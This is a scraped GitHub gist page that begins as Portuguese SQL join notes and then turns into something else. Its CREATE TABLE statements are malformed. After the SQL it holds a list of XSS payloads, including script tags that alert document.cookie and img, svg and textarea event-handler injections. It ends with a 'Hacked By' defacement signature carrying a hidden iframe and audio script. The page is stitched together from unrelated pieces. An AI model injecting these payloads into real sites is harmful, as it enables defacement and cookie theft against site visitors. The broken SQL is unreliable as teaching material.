Last active
February 17, 2025 06:14
-
-
Save thiagosouza/8be78e0efa1830ff39bafa954bc853c2 to your computer and use it in GitHub Desktop.
[SQL] SQL #sql
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--Data | |
INSERT INTO TabelaA VALUES('Fernanda') | |
INSERT INTO TabelaA VALUES('Josefa') | |
INSERT INTO TabelaA VALUES('Luiz') | |
INSERT INTO TabelaA VALUES('Fernando') | |
INSERT INTO TabelaB VALUES('Carlos') | |
INSERT INTO TabelaB VALUES('Manoel') | |
INSERT INTO TabelaB VALUES('Luiz') | |
INSERT INTO TabelaB VALUES('Fernando') | |
--|Tabela A|Tabela B | |
--|Fernanda|Carlos | |
--|Josefa |Manoel | |
--|Luiz |Luiz | |
--|Fernando|Fernando | |
--Inner Join | |
SELECT a.Nome, b.Nome | |
FROM TabelaA as A | |
INNER JOIN TabelaB as B on a.Nome = b.Nome | |
--|Tabela A|Tabela B | |
--|Fernanda|Carlos | |
--|Josefa |Manoel | |
--|Luiz |Luiz | |
--|Fernando|Fernando | |
Left Join | |
Right Join | |
Outer Join | |
Left Excluding Join | |
Right Excluding Join | |
Outer Excluding Join | |
Cursos de SQL | |
--https://www.devmedia.com.br/sql-join-entenda-como-funciona-o-retorno-dos-dados/31006 | |
CREATE TABLE table_users( | |
userId varchar(50) NULL | |
addressId: int() | |
) | |
GO | |
CREATE TABLE table_addresses( | |
userId varchar(50) NULL | |
) |
hello”><IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”>
"><IMG SRC="https://f.top4top.io/p_1948g5dvz0.png"ONERROR=JAVASCRIPT:ALERT(6)>
<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(“XSS”)</script> <script>alert(“XSS”);</script> <script>alert(‘XSS’)</script>“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script> <script>alert(/XSS/)</script></script><script>alert(1)</script>
<>">"/>/">'>'/>/'>/>> <img/src=("RATUXPLOIT");>onerror=prompt(1);>
CLICKME "> "><svg/onload=prompt(1);> "> <textarea autofocus onfocus=alert(1)> "> ">
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
~~Hacked By~~
Ratu Annisa Balqis
MENCINTAI ! TIDAK HARUS MEMILIKI !!!
©xploitercrew
<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay"" src="" allowfullscreen="none" ></iframe>@2021
<style type="text/css"> .lagu{ background:transparent; border:4px solid #fff; font-family:Share Tech Mono; color:purple; font-size:20x; font-weight:bold; padding:3px 15px; text-decoration:none; text-shadow:0px 0px 30px #fff; } </style> <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } </script> Music